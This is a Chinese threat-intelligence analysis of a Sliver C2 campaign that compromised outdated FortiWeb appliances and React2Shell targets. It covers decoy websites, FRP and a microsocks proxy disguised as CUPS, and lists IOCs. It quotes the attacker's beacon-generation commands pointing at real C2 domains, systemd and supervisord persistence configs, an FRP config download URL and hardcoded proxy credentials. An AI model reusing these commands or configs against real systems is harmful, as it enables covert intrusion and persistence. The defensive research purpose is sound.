2026-01-04 01:48:07 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文披露了针对FortiWeb设备的SliverC2攻击活动。攻击者利用React2Shell漏洞及过期设备植入后门，并通过FRP和伪装成CUPS的代理工具进行内网渗透。受害者涉及多国金融与政府部门，且设备因缺乏EDR监控难以发现。文章强调边缘设备存在巨大盲点，建议加强边界设备的日志审计与漏洞修补。 综合评分： 88 文章分类： 威胁情报,恶意软件,红队,漏洞分析,内网渗透

cover_image

EDR 在哪里？从防火墙运行的 Sliver C2 攻击分析

Ctrl-Alt-Int3l

securitainment

2026年1月2日 14:50 中国香港

引言

在 Censys 平台上进行常规开放目录威胁狩猎时，我们发现了一个威胁行为者暴露的 Sliver C2 数据库和日志等信息。通过分析这些数据库、日志及相关基础设施，我们确认该威胁行为者成功利用了多台 FortiWeb 设备来部署 Sliver。此外，该组织还利用 React2Shell (CVE-2025-55182) 漏洞部署 Sliver，并使用快速反向代理 (FRP) 工具将受害主机的本地服务远程暴露。

您可以使用 Censys/Shodan 快速搜索活跃的开放目录，并找到类似的暴露基础设施，尽管它们不稳定且可能很快下线。如果我没记错的话，Hunt.io 是唯一一个持续归档恶意开放目录的平台。值得注意的是，本研究中提到的一些开放目录已在该平台上归档。虽然我们不会分享受害者信息或从其开放目录收集的所有文件，但这些数据可在 Hunt.io 平台上访问。

初始入侵

证据显示，该威胁组织通过利用面向公众的漏洞获得初始访问权限，并将 Sliver C2 部署至受害主机。威胁行为者利用了 React2Shell (CVE-2025-55182) 漏洞，同时也入侵了大量 FortiWeb 设备。由于我们未能获取相关 POC，因此用于入侵 FortiWeb 设备的具体漏洞尚不明确，但这些设备均已过期。

命令与控制

Sliver C2

| C2 域名 | 注册日期 | C2 IP | ASN | | — | — | — | — | | ns1.ubunutpackages.store | 2025-12-26 | 195.20.17.253 (活跃 – 31/12/25) | 62005 | | ns1.bafairforce.army | 2025-09-24 | 193.233.201.12 (活跃 – 31/12/25) | 62005 | | ns1.bafairforce.army | 2025-09-24 | 45.150.108.43 (历史) | 62005 | | ns1.bafairforce.army | 2025-09-24 | 80.78.18.142 (历史) | 39287 | | ns1.bafairforce.army | 2025-09-24 | 192.81.210.81 (历史) | 14061 |

根据对 C2 数据库和日志的分析，运行在 ns1.ubunutpackages[.]store上的 Sliver C2 创建于 22/12/25 07:04 UTC。向该 Sliver C2 实例信标回连的受害主机大多为过期的 FortiWeb 设备。此外，威胁行为者还为该域名创建了一个伪装的 “Ubuntu Packages” 网站：

generate beacon --http &nbsp;ns1.ubunutpackages.store --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60
websites add-content --website ubuntupackages --web-path / --content /root/dom/ubuntu-packages.html
https --domain ns1.ubunutpackages.store --cert /root/dom/cert.pem --key /root/dom/key.pem --website ubuntupackages

Sliver C2 域名 ns1.bafairforce[.]army同样设置了 “诱饵” 页面，伪装成 “加入孟加拉国空军”。

generate beacon --http &nbsp;ns1.bafairforce.army --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60
websites add-content --website ipcheck --web-path / --content /home/user1/web/index.html
websites add-content --website ARMED_FORCES_DIVISION --web-path / --content /root/website-bd/index.html
https --domain ns1.bafairforce.army --cert /root/website-bd/cert.pem --key /root/website-bd/key.pem --website ARMED_FORCES_DIVISION

伪装成孟加拉国空军并非偶然，这是一个战略性选择，因为向域名 bafairforce[.]army信标回连的多个受害者可能是孟加拉国的组织。

Sliver 植入程序

FortiWeb 上的 Sliver

我们发现从 5.4.202到 6.1.62版本的 FortiWeb 设备均遭到入侵。Sliver 二进制文件被部署至路径 /bin/.root/system-updater。

值得注意的是，我们还观察到 1 台中国 “受害” 主机，该主机与 FortiWeb 无关，部署路径为 /app/web/system-updater。

| 首次信标 | 植入程序名称 | 操作系统 | 架构 | 国家 | 二进制路径 | 操作系统版本 | | — | — | — | — | — | — | — | | 29/12/25 05:07:13 | ARTIFICIAL_SUPPORT | linux | amd64 | US | /bin/.root/system-updater | Linux FortiWeb 5.4.202 | | 29/12/25 05:20:44 | ARTIFICIAL_SUPPORT | linux | amd64 | SA | /bin/.root/system-updater | Linux FortiWeb 5.4.202 | | 29/12/25 05:58:59 | ARTIFICIAL_SUPPORT | linux | amd64 | US | /bin/.root/system-updater | Linux FortiWeb 6.1.62 | | 29/12/25 06:03:59 | ARTIFICIAL_SUPPORT | linux | amd64 | IN | /bin/.root/system-updater | Linux FortiWeb 5.4.202 | | 29/12/25 06:11:25 | ARTIFICIAL_SUPPORT | linux | amd64 | US | /bin/.root/system-updater | Linux fweb-nt-fwb 6.1.62 | | 29/12/25 06:47:57 | ARTIFICIAL_SUPPORT | linux | amd64 | ZA | /bin/.root/system-updater | Linux FortiWeb 5.4.202 | | 29/12/25 06:53:55 | ARTIFICIAL_SUPPORT | linux | amd64 | US | /bin/.root/system-updater | Linux FortiWeb 6.1.62 | | 29/12/25 07:06:20 | ARTIFICIAL_SUPPORT | linux | amd64 | US | /bin/.root/system-updater | Linux FortiWeb 6.1.62 | | 29/12/25 07:10:39 | ARTIFICIAL_SUPPORT | linux | amd64 | IN | /bin/.root/system-updater | Linux FortiWeb 5.4.202 | | 29/12/25 07:16:37 | ARTIFICIAL_SUPPORT | linux | amd64 | IN | /bin/.root/system-updater | Linux FortiWeb 5.4.202 | | 29/12/25 12:45:05 | ARTIFICIAL_SUPPORT | linux | amd64 | CN | /app/web/system-updater | Linux a19f1ef3ded0 6.13.7-orbstack-00283-g9d1400e7e9c6 |

Sliver 持久化

威胁行为者通过 Systemd 服务 (T1543.002) 和修改系统进程 (T1543) 的方式在 Linux 主机上实现持久化。

更新器服务

[Unit]
Description=Updater Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/.root/system-updater

# Restart behavior
Restart=on-failure
RestartSec=5
[...已删减...]
# Logging
StandardOutput=journal
StandardError=journal

[Install]
WantedBy=multi-user.target

上述文件 updater.service在暴露的开放目录中被发现，该文件是用于持久化的 systemd 服务配置。

Supervisord

[supervisord]
nodaemon=true

[program:rootbinary]
command=/bin/.root/system-updater
autostart=true
autorestart=true

此外，我们可以看到威胁行为者修改了 supervisor.conf文件以实现 Sliver C2 的持久化执行。

代理基础设施

FRP

在将 Sliver C2 部署至受害主机后，威胁行为者利用该框架进一步部署代理工具。其中，快速反向代理 (FRP) 被广泛使用。

我们观察到该工具及其配置文件托管在 hXXp://45.83.181[.]160:8003/frpc.toml，并被下载至受害主机。FRP 服务器 (frps) 显示存在多个活跃受害者。

我们可以将 Sliver 数据库中的受害者 IP 地址与 FRP 服务器进行交叉验证。

microsocks

除 FRP 外，威胁行为者还使用了开源工具 microsocks，该工具以文件名 cups-lpd投放。通过分析该二进制文件，我们发现它会在端口 515 上暴露 SOCKS 服务，而 515 恰好是合法 Linux CUPS 行式打印机守护进程的监听端口：

该 microsocks 服务曾通过 Systemd 服务实现持久化：

[Unit]
Description=Updater Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/.root/cups-lpd
[...已删减...]

从信标数据库中，我们可以在 Censys 上找到运行在 FortiWeb 主机端口 515上的暴露 SOCKS 服务：

值得注意的是，虽然在上述案例中未被使用，但该工具包含硬编码凭据 Monkhood6703:64d9cb9c5f075dfaa371a6f，如果 cups-lpd服务使用 -1/-w开关运行，则该凭据可被使用。

受害者情况

在恢复的 C2 数据库中，排除误报或沙箱主机名后，共有 30 个独立 IP 地址进行信标回连。在巴基斯坦和孟加拉国观察到多个受害者，其中包括金融和政府部门的组织。

结论

这些攻击凸显了使用 FortiWeb 等边缘设备的组织在可见性和遥测方面存在的巨大盲点。在本案例中，我们仅因操作员留下暴露的 Sliver 日志和数据库才获得了潜在入侵的证据。这类设备通常不具备内置 AV/EDR 功能，我们也未听说过有人自行安装相关防护。这使得在设备上充分且有效地进行威胁狩猎变得极其困难。

尽管首个 C2 域名在三个月前注册，但恢复的数据显示，在短短八天内 (2025-12-22 至 2025-12-30)，就有 30 台独立且真实的主机被纳入控制。使用孟加拉国主题的诱饵页面和 C2 基础设施，与数据库中发现的一些孟加拉国受害者相吻合，表明该行动具有明确针对性而非机会主义。最后，使用重命名的 microsocks二进制文件 (cups-lpd) 绑定至端口 515 以伪装成 CUPS，并通过 FortiWeb 设备上的 Systemd 服务运行，突显了威胁行为者为隐蔽行踪并实现持久化所付出的努力。

IOC 指标

载荷/工具

网络

| 类型 | 指标 | 备注 | | — | — | — | | URL / C2 | https://ns1.ubunutpackages[.]store | 针对 FortiWeb 实例；观察到来自 195.20.17[.]253；域名注册于 2025-12-26 | | URL / C2 | https://ns1.bafairforce[.]army | 针对 FortiWeb + React2Shell；观察到来自 193.233.201[.]12；域名注册于 2025-09-24 | | IP | 193.233.201[.]12 (AS 62005) | Sliver C2；观察到开放目录 | | IP | 195.20.17[.]253 (AS 62005) | Sliver C2；观察到开放目录 | | IP | 45.150.108[.]43 (AS 62005) | Sliver C2 | | IP | 45.143.167[.]7 (AS 62005) | Sliver C2；观察到开放目录 | | IP | 80.78.18[.]142 (AS 39287) | Sliver C2 | | IP | 192.81.210[.]81 (AS 14061) | Sliver C2 | | IP | 45.83.181[.]160 (AS 44559) | 快速反向代理 (FRP) 服务器；观察到开放目录 |

| C2 域名 | 注册日期 (报告) | C2 IP | 状态/备注 | ASN | | — | — | — | — | — | | ns1.ubunutpackages[.]store | 2025-12-26 | 195.20.17[.]253 | 活跃 (31/12/25) | 62005 | | ns1.bafairforce[.]army | 2025-09-24 | 193.233.201[.]12 | 活跃 (31/12/25) | 62005 | | ns1.bafairforce[.]army | 2025-09-24 | 45.150.108[.]43 | 历史 | 62005 | | ns1.bafairforce[.]army | 2025-09-24 | 80.78.18[.]142 | 历史 | 39287 | | ns1.bafairforce[.]army | 2025-09-24 | 192.81.210[.]81 | 历史 | 14061 |

Where is the EDR? Sliver C2 running from firewalls

免责声明：本博客文章仅用于教育和研究目的。提供的所有技术和代码示例旨在帮助防御者理解攻击手法并提高安全态势。请勿使用此信息访问或干扰您不拥有或没有明确测试权限的系统。未经授权的使用可能违反法律和道德准则。作者对因应用所讨论概念而导致的任何误用或损害不承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：securitainment Ctrl-Alt-Int3l《EDR 在哪里？从防火墙运行的 Sliver C2 攻击分析》